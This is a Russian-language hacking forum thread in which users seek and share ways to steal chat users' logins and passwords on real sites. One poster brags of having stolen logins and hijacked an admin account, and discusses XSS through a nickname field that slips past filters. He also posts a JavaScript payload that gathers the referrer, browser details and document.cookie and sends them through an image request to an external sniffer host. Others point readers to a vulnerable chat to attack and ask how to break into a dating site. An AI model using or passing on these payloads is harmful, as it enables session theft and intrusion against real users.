Здрям, Поцики!!
Кто знает, как из фрейма вытянуть инфу?
Ну когда жертва открывает соседнее окно со скриптом (как написать???)
Фрейма -4, один из них пишу-))
Фрейм:

<form action="http://HACKED-CHAT.ru/cgi-bin/chat/chat.cgi" name="post" method="POST" >
<input type="hidden" name="action" value="post">
<input type="hidden" name="password" value="1234">
<input type="hidden" name="login" value="Vasja-Lamer">
<input type="text" size="40" name="post" MAXLENGTH=400 >
<input type="submit" value="Сказать" >
<input type="submit" name=act value="Сделать" >
</form>
<script language="javascript">
document.post.post.focus();
</script><br><br><br><br>

Знает кто????
Дмитро

http://smaylik.by.ru/i/773.gif

Дмитро! чувак давай поконкретней!

Смысл такой: В чате - 4 фрейма, пароль и логин везде прописывается открыто,и в строке браузера пишется: тра-та-та/cgi-bin/chat.cgi&login=Vasya&password=123
Но сниф закинуть непосредственно в тела чата не получается,там СУПЕР-фильтр, мысль такая:
Жертва открывает отдельное окно, в котором должен быть скрипт,либо вытягивающий PASSW из любого
фрейма, либо Внедряющийся в окно чата, ну там путём: FRAMESET,или чёто в этом духе..ну а дальше, на мыло или путём get..

Я с этим ранее не работал, по этому имею плохое
представление о обращениях фреймов друг к другу.
Но точно знаю,что можно-)
Вот эти записи типо top.frames[3].document.forms[0]
я слабо понимаю.
Раньше всегда сам разбирался,но здесь помощь нужна, а то я в тупике .
Тфу блин, так если в строке браузера пропис-ся
пароль,так его ж и надо снифом глушить, но тогда как его всунуть??? (но строка в браузере меняется каждые 5 сек. и становится без пароля (../online.cgi)
Блин,посоветуйте чёнть конкретное??????
:rolleyes:
Dmitro

http://smiliki.fromru.com/img/335.gif

У меня есть кое-какая мысля по этому поводу ...
Скажи название фрейма ...

По идее невозможно из загруженной html-странички получить доступ к другой страничке, которая открыта в данный момент ... Но, допустим, открыто окно и там фрейм с именем password и если использовать метод

window.open("http://antichat.ru", "password")

и грузить туда наш сайт, то все пройдет нормально, но т.к. фрейм с именем password уже существует, то сайт загружается в уже открытое окно ...
У меня возникли сложности с извлечением содержимого фрейма password ...

Я хотел, чтобы фрейм загрузился в окно, которое размещено на сайте, куда мы заманим юзера и это все загруженное передалось на сниффер ...

Тот, что написал, - "POST" , но блин, там и "MAIN" , и др. есть... А вообще PASSWORD и LOGIN в строке браузера: ...../chat.cgi&login=VASYA&password=123
Фильтр стоит Приличный, как же в тело чата сниф засунуть???? С помощью FRAMESET , ну или вытянуть инфу
путём get, или там на мыло... ??? Короче лучше раз увидеть, чем сто раз... Могу на мыло выслать pass и login, чтоб войти, а то там регистрацию запретили ..
А логины - не вопрос... я их понапиз...л прилично, тока
боюсь, не надолго, периодически всех!!! киляют.
Я там достал всех уже своим вторжением-))

Этот чат использую как учебное пособие для взломов. (http://perewozky.narod.ru)

http://smiliki.fromru.com/img/374.gif

window.open("http://antichat.ru", "post")

Пробывать сделать, чтобы во фрейм грузился сниффер нет смысла ...

Подумаю насчет передачи PASSWORD и LOGIN на сниффер ...

У меня один последний ник остался....
Вот такие там СССобаки!!!
Грех не взломать,да?
Но терь походу придётся базу паролей искать,но у меня и с этим тоже не очень...
пробовал всякие ../../htpaswd и всякую фигню, но пока безуспешно((
ЛЮДИ!!! Советуйте!!!
Дмитро

http://smiliki.fromru.com/img/239.gif

window.open("http........", "post")
это всё я давно там пробовал, фигня всё это...
максимум грузится страница и отображается во всё окно, а надо только в фрейм, а лучше чтоб в невидимый фрейм, снифер туда никак...
НО!!! когда я взламывал там Админа, то я и снифы вставлял прямо в тело чата, и невидимые ссылки onmouseover на сниф и т.д. там же и во фреймы кидал чё мне надо.. А ВОТ не имея прав админа Пытаюсь из соседнего окна что то вставить.

Блин да можно так делать, я просто уже всё позабыл-))

НУ КТОНТЬ ЗНАЕТ ???
:rolleyes: :rolleyes: :rolleyes:
http://smaylik.by.ru/i/759.gif

кинь мне в аську адресс и логин с паролем чата

В том чате "Борнео" разрешена регистрация !
Если кто не желает помучить бедный дырявый чат не
заходите туда, а то у вас это может получиться ...
Здесь ссылка Borneo.ru (http://borneo.ru/chat/)


хи-хи-хи... :D


описание дырок на гл. странице (статья про взлом чатов и в пример конкретный...)
http://smaylik.by.ru/i/750.gif

Жизненно важный вопрос!!
Если ктонть знает, скажите, в обычном html документе можно скрипт написать, узнающий реферера, или я опять страдаю иллюзиями о лёгких взломах??????


УБЕДИТЕЛЬНО ПРОШУ ответить тех, кто знает, хотя бы в принципе???

:D :D
http://smaylik.by.ru/i/739.gif

Реферера ? Для текущего документа можно узнать ...

Вообщем то попал на один чат, построение впринципе уже знакомое,но! уж через-чур фильтры сильные: ничё не пропускает,кроме как через ник,
и то немного.. короче:
......
<a href="#end" onclick="return Write('НИК, ')">
<b>НИК:</b></a><font color=C0C0C0> Сообщение</font> ......

в нике пропускаются : & # % ' > / \ ;
единственное,что смог - эт на событие onclick, но не могу перекрыть двойную кавычку onclick, можно ли что то
сделать,хотя бы вывести на onmouseover ?????
У меня нифика не получилось.... (http://perewozky.narod.ru)
Да,кстати только в нике! а в репликах на всё фильтр.

Помоги, плиииз ?
http://smaylik.by.ru/i/580.gif

пам-парам-пам-пам-пам-парам-парарарарам-парам-пам-пам...

походу здесь нифика не видно и никто мне не ответит....


тогда надо тему кильнуть...........

http://smaylik.by.ru/i/123.gif

КРУТО!!! Написал скрипт, который всё же вытягивает инфу о рефере, и не тока... И всё в HTML..
Спасибо за вдохновление Кубинскому приятелю че гевере :))
Хоть algol и говорил, что нельзя...
Ну вообщем он будя всё выдавать о юзере.
Может кому тоже нужно будет, так я не жадный (Продвинутым можно не читать, а то опять скажите,что эт уж давно известно или чёнть в этом духе... )
Ещё одно изобретение (можно узнать и не тока для текущего HTML но и... ) Но простите, пока все чаты не переломаю фиг скажу... ХА!

-:)

<Script language="JavaScript"> if(navigator.userAgent.indexOf('IRIX') != -1) { var OpSys = "Irix"; } else if((navigator.userAgent.indexOf('Win') != -1) && (navigator.userAgent.indexOf('95') != -1)) { var OpSys = "Windows 95"; } else if(navigator.userAgent.indexOf('Win') != -1) { var OpSys = "Windows 3.1 or NT"; } else if(navigator.userAgent.indexOf('Mac') != -1) { var OpSys = "Macintosh"; } else { var OpSys = "Other"; }date= new Date();zone= date.getTimezoneOffset();gmt= date.toGMTString();bname=navigator.appName;bversio n=navigator.appVersion;if (bname=="Netscape"){bplugins=navigator.plugins.length;}if (bname=="Netscape"){address=java.net.InetAddress.getLocalHost(); ip=address.getHostAddress();}loc=location.href;mod i=document.lastModified;refer=document.referrer;if (bname=="Netscape"){var tools=java.awt.Toolkit.getDefaultToolkit();var size=tools.getScreenSize();w=size.width;h=size.hei ght;}</Script><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+refer+loc+OpSys+modi+date+bname+bversion+document .cookie;</script>

Вообще то я его в одну строчку делал, так шо проверять не буду чё там после вставки стало.. да и немного выдернул из него (секрет)
А идею мне счётчики статистик подкинули, они много чего могут..
Короче вставляю его в инфу (В чате) через юзерагента, как я писал в статье для новичков, и в логах сникерса смотрим........
Так шо версия для новичков, но и то харшо...
А другие данные - эт конеШна секрет.

тфу блин, лишнего урезал.. если надо скрин сайз, то ещё к сникерсу +h и +w..

Да, кстати, чё, кто-то GOOGLE заснифирил??? я когда
логи смотрел, видел там про него... Эт круто! Молодцы!
&clubs; -Dmitro- &clubs;
http://smaylik.by.ru/i/474.gif

http://smiliki.fromru.com/img/239.gif
КтоНьть знает как ломануть love.rambler.ru ?? там посетителей неибаца, можно свой сайт раскрутить прилично...
:) :)

http://smiliki.fromru.com/img/239.gif
КтоНьть знает как ломануть love.rambler.ru ?? там посетителей неибаца, можно свой сайт раскрутить прилично...
:) :)

Будет статья на этот счет... Жди...